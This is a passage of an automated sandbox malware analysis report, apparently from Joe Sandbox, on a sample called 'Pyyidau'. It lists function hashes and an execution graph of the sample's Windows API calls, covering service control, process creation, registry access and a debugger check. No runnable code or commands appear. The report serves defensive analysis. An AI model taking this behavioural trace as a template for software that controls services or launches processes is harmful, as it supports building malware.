                                                                                          • Instruction Fuzzy Hash: F4D0A7E6B1D6504FC70213707C1649E3BD0D5C53157041867D406C7DC3D62C941643C1
                                                                                          Function 04EAB660 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51e1eec255ac667104d07a8c7d421418250aafed5f08b5d8da6fb33684a6638a
                                                                                          • Instruction ID: 5276b4681842c5f3f646f49cbd8c29483f9ff81c4776c2d7d37f44be3f0ba298
                                                                                          • Opcode Fuzzy Hash: 51e1eec255ac667104d07a8c7d421418250aafed5f08b5d8da6fb33684a6638a
                                                                                          • Instruction Fuzzy Hash: 16C0127255BA406FDF02067DB4560D0BB30E50731534150D6C68844423812662278793
                                                                                          Function 04EA9678 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dc204894b49135de1f58ec16bbc74206b9e5b60c97a4b85657dc80abe6d0ae0e
                                                                                          • Instruction ID: a1e293afd66162db773c5f0629e0f7a17ffbff7ef3a37739130daaff7b9120e6
                                                                                          • Opcode Fuzzy Hash: dc204894b49135de1f58ec16bbc74206b9e5b60c97a4b85657dc80abe6d0ae0e
                                                                                          • Instruction Fuzzy Hash: 17D01770A1520CFFCB00DFA8E90699DBBF9EB84208B5044A8D808D3340EB316E019B91
                                                                                          Function 04EA40B0 Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d1f17f940f67645623bd6863e8a327aee096b45164e621e24ad56f717680856b
                                                                                          • Instruction ID: 4a1a4ed3e0225bd7a587a8edaf6d968ae1a6f10841ced57db0cc275257660b53
                                                                                          • Opcode Fuzzy Hash: d1f17f940f67645623bd6863e8a327aee096b45164e621e24ad56f717680856b
                                                                                          • Instruction Fuzzy Hash: 56C08C916882002EDE24B2B0256C0AC1614DBC72303200CA6E482C3082C918B48483D9
                                                                                          Function 0998ECB0 Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23caa5f102cbb8b890d75e629e0a96e28feab0efa43a1acc22c97b66d96d2a57
                                                                                          • Instruction ID: 8eab0791340e57cf6d90a0cd9a728fd15e0b578d1e9c7960c801869cecf14ccc
                                                                                          • Opcode Fuzzy Hash: 23caa5f102cbb8b890d75e629e0a96e28feab0efa43a1acc22c97b66d96d2a57
                                                                                          • Instruction Fuzzy Hash: 2EC02B3004D7088BC124B7C2702C33773AC530F301F40AC0C954C022C306351000CE86
                                                                                          Function 093471F0 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbb4b9019a736436fa52184d2c0405dc399017afdf9087a268ae6fec6c4e668a
                                                                                          • Instruction ID: 3e96eb5d622b548501d0188724af01495fe1b706ef31ec70b247cdd59467fa88
                                                                                          • Opcode Fuzzy Hash: fbb4b9019a736436fa52184d2c0405dc399017afdf9087a268ae6fec6c4e668a
                                                                                          • Instruction Fuzzy Hash: 8FC08C300002484BD6243BE9600932D72C81B46206F41A014F15C720A28A3820408DBB
                                                                                          Function 04EA80AE Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f28b15e0a7d6fe1d464672681c7b3d4067f6576b4ef3c8174a4d3d383544d391
                                                                                          • Instruction ID: 77def657e1b599015e7e00a4d50610c005ce0b1941c58bc0ae727850a679933b
                                                                                          • Opcode Fuzzy Hash: f28b15e0a7d6fe1d464672681c7b3d4067f6576b4ef3c8174a4d3d383544d391
                                                                                          • Instruction Fuzzy Hash: 3BD06774E0012DDBDB25DB25C8527EC7671BB49300F4405E9C61E67340D7702ED59F54
                                                                                          Function 04EA6142 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8080ffb32acd5b6802942265626acc31e6403b4f171a370a32d413c9180aa7e4
                                                                                          • Instruction ID: fca06772b4f7f9e9ae7853ce40ad8962fb360713da057c3c144e4dba313c6d31
                                                                                          • Opcode Fuzzy Hash: 8080ffb32acd5b6802942265626acc31e6403b4f171a370a32d413c9180aa7e4
                                                                                          • Instruction Fuzzy Hash: CAD06C78E005089BEB10DBA5C951AEDB6B1BB48300F604129D4027B380D73139068F54
                                                                                          Function 04EA7A43 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9f8d5e265422cefca93aa55287cbb373160b6e11c7f3ff9251ba25676e810152
                                                                                          • Instruction ID: ff7279e5a6a69768581ab05ff447ad2cad3a99b1540e856009f93a2ee8e9a2a2
                                                                                          • Opcode Fuzzy Hash: 9f8d5e265422cefca93aa55287cbb373160b6e11c7f3ff9251ba25676e810152
                                                                                          • Instruction Fuzzy Hash: 45B09274D18224CFC7208F649404388BAB0AB08200F0440E7890DB2300EB341D60CF50
                                                                                          Function 04EA9147 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d45d74c2ba52c09ee326cfb54a475f8d4393ad14be0e044224af0eb0cf7b0d99
                                                                                          • Instruction ID: 47ba3c798893a8ddc82eb20c46949854444b452833e9e014dd467d32613f3707
                                                                                          • Opcode Fuzzy Hash: d45d74c2ba52c09ee326cfb54a475f8d4393ad14be0e044224af0eb0cf7b0d99
                                                                                          • Instruction Fuzzy Hash: 4AA01234605108CFC3108A10E0083983561F304300F101011900185305F23415005741
                                                                                          Function 04EA4ACF Relevance: .0, Instructions: 3COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c8de06222e5ac1922b54f93821830c86a9a26048ca6350b53689519f5f79ff53
                                                                                          • Instruction ID: c92eefa859523d348c316f4aad4631b53a1847e910cf12a9f59d36b2d231dfe2
                                                                                          • Opcode Fuzzy Hash: c8de06222e5ac1922b54f93821830c86a9a26048ca6350b53689519f5f79ff53
                                                                                          • Instruction Fuzzy Hash:

                                                                                          Non-executed Functions

                                                                                          Function 09347431 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: T+2
                                                                                          • API String ID: 0-3315532349
                                                                                          • Opcode ID: 7394b905394bded4a43d0bc55dafc5e190254d8f4392e27f398e642277ab0a8e
                                                                                          • Instruction ID: 5fa2a7aebf2923340bd9548cd94ee365ddd9325ff2a3da6cfd704e347e415c48
                                                                                          • Opcode Fuzzy Hash: 7394b905394bded4a43d0bc55dafc5e190254d8f4392e27f398e642277ab0a8e
                                                                                          • Instruction Fuzzy Hash: B4C16775E016188FDB58CF6AC944ADDBBF2AF89300F15C1AAD909AB365DB305E81CF50
                                                                                          Function 09970040 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?
                                                                                          • API String ID: 0-1684325040
                                                                                          • Opcode ID: 5548ce85c538cb577cc298ef409e614f8402293811d2e079139c51ed379d0d2a
                                                                                          • Instruction ID: 421aa61f0dce7d6f9c741315628951fad8dc04165344e7dd35d39ac8e9fc2ff5
                                                                                          • Opcode Fuzzy Hash: 5548ce85c538cb577cc298ef409e614f8402293811d2e079139c51ed379d0d2a
                                                                                          • Instruction Fuzzy Hash: D331FB70D046198FEB29CF2AC9587DEFAF6AF89304F00C0FA940DA7245EB7459858F41
                                                                                          Function 09970006 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?
                                                                                          • API String ID: 0-1684325040
                                                                                          • Opcode ID: 3d49da5ef951aab26c686e8124800f62a0d77093b304a9881ce2dcb636cc8dc6
                                                                                          • Instruction ID: 4f04b530bab875f4a0ef3feace724a1f0bf71db2f02a33e1100e798e982a8961
                                                                                          • Opcode Fuzzy Hash: 3d49da5ef951aab26c686e8124800f62a0d77093b304a9881ce2dcb636cc8dc6
                                                                                          • Instruction Fuzzy Hash: 05311B70D097558FD72ACF278C5428ABBF6AF86300F09C1FAC44CAA166DB744986CF51
                                                                                          Function 04EA9728 Relevance: .2, Instructions: 218COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b3d15ad5d3640eb5039170daeaeba105c8406fad34eb8dc237b31cac6ea7ba6c
                                                                                          • Instruction ID: b2ec7ffbe18a3fcd4151401c4665db09ae65af5a1e2f8b5859f47fb27782c67f
                                                                                          • Opcode Fuzzy Hash: b3d15ad5d3640eb5039170daeaeba105c8406fad34eb8dc237b31cac6ea7ba6c
                                                                                          • Instruction Fuzzy Hash: E39142B1A00248CFDB04CF59C444BEAB7B2EF84304F29D9A6E4069F256D774F991DBA1
                                                                                          Function 09343578 Relevance: .2, Instructions: 171COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9664437a037e85110d7eadaa3be4e8bec990f8419414c04211c8b68a6502b91
                                                                                          • Instruction ID: b6a3d097bf0d66cffc75c711ea349e4b3095827d85df501aa5521a938b03e806
                                                                                          • Opcode Fuzzy Hash: e9664437a037e85110d7eadaa3be4e8bec990f8419414c04211c8b68a6502b91
                                                                                          • Instruction Fuzzy Hash: 05710970A246099FE70CDF6AE951689BFF2FFC8304F14C439E4459B264EB399846CB81
                                                                                          Function 09343588 Relevance: .2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e2fb1b51541de501579c1c703c3cc7e4dff71140a26051033b2d8461ffc7509
                                                                                          • Instruction ID: 034e4203b84a3f93b6e5c4070e21617953491185e64a9b7e6103dada258e0d6e
                                                                                          • Opcode Fuzzy Hash: 8e2fb1b51541de501579c1c703c3cc7e4dff71140a26051033b2d8461ffc7509
                                                                                          • Instruction Fuzzy Hash: 3D710970A24609DFE70CDF6AE951689BFF2FFC8204F14C539E4459B264EF3998468B81
                                                                                          Function 0934DAB0 Relevance: .1, Instructions: 136COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 24ca5303053f1f61107d6f214aa9fb03779642a168093a957a83f1f5f9b1dc54
                                                                                          • Instruction ID: d2b2b30539d7f46ee92519f4d43bc796b2945833fb9d53a4f208efa806747756
                                                                                          • Opcode Fuzzy Hash: 24ca5303053f1f61107d6f214aa9fb03779642a168093a957a83f1f5f9b1dc54
                                                                                          • Instruction Fuzzy Hash: 7651F8B0D052688FDB64CFAAC9447DDBBF6AB89304F0180E9D419AB395D7746E89CF40
                                                                                          Function 0934DAA0 Relevance: .1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de1007b9b33e762028e89650db81e3cae130a791665017f4f49c711ed7f20afc
                                                                                          • Instruction ID: 218268ba4747766e803677811595eac71708b28b4c31f01a4f3d2db72cd0c8c6
                                                                                          • Opcode Fuzzy Hash: de1007b9b33e762028e89650db81e3cae130a791665017f4f49c711ed7f20afc
                                                                                          • Instruction Fuzzy Hash: 9C41F771D052688FDB68CFAAC9447DDBBF6BF89300F11C1A9D459AB294DB346A85CF00
                                                                                          Function 09343BD8 Relevance: .1, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e506c9077b028a1ec6ad03501619da24d834f3de41d2cdaf3e78e31e5fb66b2
                                                                                          • Instruction ID: 54fcaeba52c03b45c5d1020296c1dbb62e87761a748635ce5a45001d75f5eb62
                                                                                          • Opcode Fuzzy Hash: 4e506c9077b028a1ec6ad03501619da24d834f3de41d2cdaf3e78e31e5fb66b2
                                                                                          • Instruction Fuzzy Hash: AA3198B5D056188BEB68CF5BD95878EFBF6BFC8304F14C1A9D408A7254DB7419858F01
                                                                                          Function 09343BC8 Relevance: .1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db8ae544c504d40269df9860badf74fe6e8bce4b68c9c6a829266b4abd052955
                                                                                          • Instruction ID: 18a8082b753b25f9b4a3375ad3420c218e834962c5557665b2ad6f4d3584722c
                                                                                          • Opcode Fuzzy Hash: db8ae544c504d40269df9860badf74fe6e8bce4b68c9c6a829266b4abd052955
                                                                                          • Instruction Fuzzy Hash: EA3168B1D016188BEB58CF6BD95978EFAF3BFC8304F14C1A9D448A7265DB7409858F01

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.3%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:26.7%
                                                                                          Total number of Nodes:996
                                                                                          Total number of Limit Nodes:27
                                                                                          execution_graph 59815 5dea6c 59820 5d9630 OpenSCManagerW 59815->59820 59819 5def34 59821 5d968f 59820->59821 59976 5df030 59821->59976 59823 5d96b2 GetLastError 59824 5df030 210 API calls 59823->59824 59825 5d96c9 59824->59825 59883 5d9df1 59825->59883 60042 5d6700 59825->60042 59827 5df030 210 API calls 59829 5d9dfe 59827->59829 59830 5e82b3 5 API calls 59829->59830 59832 5d9e19 59830->59832 59831 5df030 210 API calls 59833 5d96f3 59831->59833 59968 5e82b3 59832->59968 59834 5d9d2e 59833->59834 59835 5d96fe QueryServiceStatus 59833->59835 59837 5df030 210 API calls 59834->59837 59836 5df030 210 API calls 59835->59836 59838 5d971f 59836->59838 59839 5d9d38 CloseServiceHandle Sleep 59837->59839 59841 5d9b1b 59838->59841 59842 5df030 210 API calls 59838->59842 59840 5d9d5a 59839->59840 59839->59883 59843 5df030 210 API calls 59840->59843 59840->59883 59846 5df030 210 API calls 59841->59846 59871 5d9d11 59841->59871 59844 5d973c 59842->59844 59845 5d9d6c GetSystemDirectoryW 59843->59845 59847 5d974c 59844->59847 59848 5d9b07 59844->59848 59857 5d9d90 59845->59857 59849 5d9b39 59846->59849 59852 5df030 210 API calls 59847->59852 59851 5df030 210 API calls 59848->59851 59853 5d9b96 59849->59853 59854 5d9b41 QueryServiceStatus 59849->59854 59850 5df030 210 API calls 59855 5d9d1e CloseServiceHandle 59850->59855 59851->59841 59856 5d9756 59852->59856 59859 5d9b94 59853->59859 59860 5d9cfd 59853->59860 59858 5d9b54 59854->59858 59854->59859 59855->59834 60045 5c6e30 59856->60045 59868 5d6700 149 API calls 59857->59868 59863 5df030 210 API calls 59858->59863 59864 5df030 210 API calls 59859->59864 59867 5df030 210 API calls 59860->59867 59866 5d9b60 59863->59866 59869 5d9bad StartServiceW 59864->59869 59866->59853 59866->59859 59882 5d9b75 Sleep QueryServiceStatus 59866->59882 59867->59871 59872 5d9dde 59868->59872 59873 5d9ce7 GetLastError 59869->59873 59874 5d9bc3 59869->59874 59871->59850 60088 5ecda8 97 API calls 59872->60088 59876 5df030 210 API calls 59873->59876 59875 5df030 210 API calls 59874->59875 59879 5d9bcf QueryServiceStatus 59875->59879 59880 5d9cf8 59876->59880 59877 5d9778 60049 593b70 236 API calls 59877->60049 59884 5d9c0d 59879->59884 59885 5d9be7 59879->59885 59880->59871 59882->59859 59882->59866 59883->59827 59889 5df030 210 API calls 59884->59889 59887 5d9bec Sleep QueryServiceStatus 59885->59887 59888 5d9c0f 59885->59888 59886 5d9793 59890 5df030 210 API calls 59886->59890 59887->59884 59887->59885 59888->59884 59891 5d9ce0 59888->59891 59892 5d9c22 59889->59892 59893 5d97a0 59890->59893 59891->59860 60087 5995b0 12 API calls 59892->60087 59895 5d99d7 59893->59895 59898 5c6e30 149 API calls 59893->59898 59896 5c6e30 149 API calls 59895->59896 59899 5d99dc 59896->59899 59897 5d9c34 59897->59871 59901 5d9c46 RegisterEventSourceW 59897->59901 59900 5d97b0 59898->59900 60082 593c80 210 API calls 59899->60082 60050 593c80 210 API calls 59900->60050 59901->59871 59903 5d9c5d GetComputerNameW 59901->59903 59906 5d9c8a wsprintfW ReportEventW DeregisterEventSource 59903->59906 59907 5d9c85 59903->59907 59905 5d99f6 60083 593b70 236 API calls 59905->60083 59906->59871 59907->59906 59908 5d97ca 60051 593b70 236 API calls 59908->60051 59911 5d9a0e 59913 5df030 210 API calls 59911->59913 59912 5d97e2 59914 5df030 210 API calls 59912->59914 59915 5d9a19 59913->59915 59916 5d97ef 59914->59916 60084 593b70 236 API calls 59915->60084 59918 5d99c2 59916->59918 59920 5c6e30 149 API calls 59916->59920 60081 593da0 70 API calls 59918->60081 59919 5d9a30 59922 5df030 210 API calls 59919->59922 59923 5d97ff 59920->59923 59924 5d9a3b ControlService 59922->59924 60052 593c80 210 API calls 59923->60052 59925 5d9ac5 GetLastError 59924->59925 59926 5d9a52 QueryServiceStatus 59924->59926 59928 5df030 210 API calls 59925->59928 59929 5d9a96 59926->59929 59930 5d9a69 59926->59930 59932 5d9ad6 Sleep 59928->59932 59934 5df030 210 API calls 59929->59934 59936 5d9a98 59930->59936 59937 5d9a75 Sleep QueryServiceStatus 59930->59937 59931 5d9819 60053 593b70 236 API calls 59931->60053 59935 5d9aa7 59932->59935 59934->59935 60085 593da0 70 API calls 59935->60085 59936->59929 59940 5d9ab6 59936->59940 59937->59929 59937->59930 59938 5d9831 59941 5df030 210 API calls 59938->59941 59942 5df030 210 API calls 59940->59942 59944 5d983e 59941->59944 59942->59935 59943 5d9af3 60086 593da0 70 API calls 59943->60086 59946 5d99b0 59944->59946 60054 5b97d0 59944->60054 60080 593da0 70 API calls 59946->60080 59949 5d9b05 59949->59841 59951 5d9870 60063 5ad710 236 API calls 59951->60063 59954 5d988a 59955 5df030 210 API calls 59954->59955 59956 5d9897 59955->59956 59959 5d98a5 59956->59959 60064 5ac620 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 59956->60064 59959->59946 60065 5aff40 59959->60065 59960 5d98bb 59960->59946 59961 5d98d2 GetSystemDirectoryW 59960->59961 59962 5c6e30 149 API calls 59961->59962 59963 5d98f6 59962->59963 59964 5df030 210 API calls 59963->59964 59965 5d9949 CreateProcessW 59964->59965 59965->59946 59966 5d997c WaitForSingleObject CloseHandle CloseHandle 59965->59966 59967 5df030 210 API calls 59966->59967 59967->59946 59969 5e82bd IsDebuggerPresent 59968->59969 59970 5e82bb 59968->59970 60502 5fa7a0 59969->60502 59970->59819 59973 5efa3d SetUnhandledExceptionFilter UnhandledExceptionFilter 59974 5efa5a 59973->59974 59975 5efa62 GetCurrentProcess TerminateProcess 59973->59975 59974->59975 59975->59819 59977 5df03c GetLocalTime wsprintfW 59976->59977 59978 5df199 59977->59978 59979 5df0b1 wvsprintfW wsprintfW 59977->59979 59981 5df1b6 EnterCriticalSection 59978->59981 59982 5df1a1 InitializeCriticalSection 59978->59982 59979->59978 59980 5df0e1 59979->59980 59980->59978 59983 5df0ed 59980->59983 59984 5df1e9 GetCurrentDirectoryW 59981->59984 59994 5df1ca 59981->59994 59982->59981 59987 5df101 59983->59987 60089 5e7ca4 59983->60089 59984->59994 59986 5df599 59988 5e82b3 5 API calls 59986->59988 59987->59986 59987->59987 59990 5df16e 59987->59990 59991 5df5a6 59988->59991 59989 5df423 LeaveCriticalSection 59992 5e82b3 5 API calls 59989->59992 59997 5e82b3 5 API calls 59990->59997 59991->59823 59993 5df43b 59992->59993 59993->59823 59994->59989 59995 5df43f 59994->59995 59996 5df288 59994->59996 59999 5e9583 136 API calls 59995->59999 59996->59989 60106 5e9583 59996->60106 59998 5df195 59997->59998 59998->59823 60001 5df45f 59999->60001 60001->59989 60003 5df468 60001->60003 60116 5b34a0 190 API calls 60003->60116 60004 5df335 GetKeyState 60005 5df344 GetKeyState 60004->60005 60022 5df34d 60004->60022 60005->60022 60008 5df2b9 60110 5919e0 111 API calls 60008->60110 60009 5df4ac 60038 5df4fe 60009->60038 60118 5c9130 189 API calls 60009->60118 60010 5df473 60010->60009 60117 5e73d1 99 API calls 60010->60117 60012 5df2cd 60016 5df315 60012->60016 60111 5ea397 78 API calls 60012->60111 60013 5df395 wsprintfW RegOpenKeyExW 60017 5df3d1 RegQueryValueExW 60013->60017 60013->60022 60024 5df32a 60016->60024 60113 5e8c09 102 API calls 60016->60113 60021 5df40c RegCloseKey 60017->60021 60017->60022 60019 5df4ce 60119 5e762e 99 API calls 60019->60119 60021->60022 60022->59989 60022->60013 60022->60021 60115 5e83d7 67 API calls 60022->60115 60023 5df52a 60122 5e762e 99 API calls 60023->60122 60114 5b1dc0 187 API calls 60024->60114 60030 5df548 60034 5df554 OutputDebugStringW 60030->60034 60035 5df561 LeaveCriticalSection 60030->60035 60031 5df4f3 60120 5e79a7 66 API calls 60031->60120 60032 5df2e4 60032->60016 60112 5e83d7 67 API calls 60032->60112 60034->60035 60037 5df578 60035->60037 60039 5df58b 60037->60039 60123 5e8c09 102 API calls 60037->60123 60121 5c9130 189 API calls 60038->60121 60124 5b1dc0 187 API calls 60039->60124 60043 5c6e30 149 API calls 60042->60043 60044 5d6705 OpenServiceW GetLastError 60043->60044 60044->59831 60459 5da5b0 60045->60459 60047 5c6e3d 60048 593c80 210 API calls 60047->60048 60048->59877 60049->59886 60050->59908 60051->59912 60052->59931 60053->59938 60055 5e7ca4 66 API calls 60054->60055 60056 5b97ee 60055->60056 60057 5b9820 60056->60057 60058 5b97f7 wsprintfW 60056->60058 60060 5e82b3 5 API calls 60057->60060 60501 5b0c30 187 API calls 60058->60501 60061 5b983d 60060->60061 60061->59951 60062 5acf10 21 API calls 60061->60062 60062->59951 60063->59954 60066 5aff53 GetModuleHandleW GetProcAddress 60065->60066 60067 5b0014 60065->60067 60068 5aff9a GetCurrentProcessId OpenProcess 60066->60068 60069 5aff7f GetCurrentProcessId 60066->60069 60067->59960 60070 5affb7 OpenProcessToken 60068->60070 60072 5affe7 60068->60072 60073 5aff88 60069->60073 60071 5affc8 60070->60071 60070->60072 60071->60072 60075 5affcf GetTokenInformation 60071->60075 60076 5b0003 CloseHandle 60072->60076 60077 5b0006 60072->60077 60073->60068 60074 5aff8c 60073->60074 60074->59960 60075->60072 60076->60077 60078 5b000a CloseHandle 60077->60078 60079 5b000d 60077->60079 60078->60079 60079->60067 60080->59918 60081->59895 60082->59905 60083->59911 60084->59919 60085->59943 60086->59949 60087->59897 60088->59883 60090 5e7d21 60089->60090 60099 5e7cb2 60089->60099 60133 5ef463 DecodePointer 60090->60133 60092 5e7d27 60134 5ecfc7 66 API calls 60092->60134 60095 5e7ce0 RtlAllocateHeap 60096 5e7d19 60095->60096 60095->60099 60096->59987 60098 5e7d0d 60131 5ecfc7 66 API calls 60098->60131 60099->60095 60099->60098 60100 5e7cbd 